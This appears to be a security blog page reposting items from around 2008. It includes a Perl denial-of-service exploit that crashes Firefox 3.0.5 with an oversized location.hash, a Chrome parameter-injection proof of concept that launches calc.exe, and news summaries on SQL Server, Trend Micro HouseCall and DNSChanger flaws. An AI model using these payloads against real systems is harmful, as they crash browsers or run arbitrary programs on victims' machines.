Mozilla Firefox 3.0.5 location.hash Remote Crash Exploit

#!/usr/bin/perl
# mzff_lhash_dos.pl
# Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# Crash on Vista, play with it on XP

$filename = $ARGV[0];
if(!defined($filename))
{

     print "Usage: $0 <filename.html>\n\n";

}

$head = "<html>" . "\n" . "<script type=\"text/javascript\">" . "\n";
$trig = "location.hash = \"" . "A" x 20000000 . "\";" . "\n";
$foot = "</script>" . "\n" . "</html>";

$data = $head . $trig . $foot;

     open(FILE, '>' . $filename);
     print FILE $data;
     close(FILE);

exit;

Source:
http://www.milw0rm.com/exploits/7554

Posted in Coding, Internet, Security | No Comments

Google Chrome Remote Parameter Injection

Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches:
http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.html

click the following link with IE while monitoring with procmon
-->
<a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>

Source:
http://www.milw0rm.com/exploits/7566

Posted in Coding, Internet, Security, Software | No Comments

Microsoft confirms critical SQL Server vulnerability

Microsoft late Monday issued a pre-patch advisory confirming a remote code execution vulnerability affecting its SQL Server line.

The vulnerability, publicly disclosed with exploit code more than two weeks ago, affects Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2005 Express Edition, Microsoft SQL Server 2000 Desktop Engine (MSDE 2000), Microsoft SQL Server 2000 Desktop Engine (WMSDE), and Windows Internal Database (WYukon).

The vulnerability is not exposed anonymously. An attacker would need to either authenticate to exploit the vulnerability or take advantage of a SQL injection vulnerability in a Web application that is able to authenticate, Microsoft explained.

A T-SQL script is available to test systems for this issue. In the absence of a patch, Microsoft recommends that SQL Server admins deny permissions on the sp_replwritetovarbin extended stored procedure. See more in the Microsoft advisory.

Source:
http://blogs.zdnet.com/security/?p=2333

Posted in Coding, Internet, Networking, Privacy, Security, Software, Windows | No Comments

Researchers sound alarm about bug in free antivirus scanner

A bug in Trend Micro’s free online virus scanning service can be used by hackers to hijack Windows PCs running Internet Explorer, security researchers warned.

Attackers able to dupe users into visiting a malicious Web page could exploit a vulnerability in the custom ActiveX control that Trend Micro distributes to users of its free HouseCall service, said Danish bug tracker Secunia ASP in an alert posted Sunday.

HouseCall bills itself as a free scanning tool that checks “whether your computer has been infected by viruses, spyware, or other malware.”

“The vulnerability is caused due to a use-after-free error in the HouseCall ActiveX control (Housecall_ActiveX.dll),” said Secunia’s warning. “This can be exploited to dereference previously freed memory by tricking the user into opening a Web page containing a specially crafted ‘notifyOnLoadNative’ callback function.”

Trend Micro has fixed the flaw in the ActiveX control and patched the public HouseCall servers, but it noted that the latter has not been extensively tested, and essentially waived responsibility if it turns out not to be sufficient.

Source:
http://www.computerworld.com.au/article/271665/researchers_sound_alarm_about_bug_free_antivirus_scanner

Posted in Coding, Internet, Security | No Comments

DNSChanger 2.0

DNS Changer 2.0 (Trojan.Flush.M) is the next –in the wild- variant of this famous malware. Now the strategy has been changed, no need to modify the DNS settings on ADSL routers. Instead it will install a network driver (NDISProt.sys) which allows the malware to send/receive raw Ethernet packets. Such approach will help it bypass Windows TCP/IP, FW and HIPS.

It installs a rogue DHCP server on the infected machine and listens for DHCP requests and responds with its own crafted DHCP offer packets. The reply contains malicious DNS servers, which will redirect hosts to infected websites that include everything from phishing to exploit-and-infect pages.

Source:
http://www.offensivecomputing.net/?q=node/1012

Posted in Internet, Networking, Privacy, Security | No Comments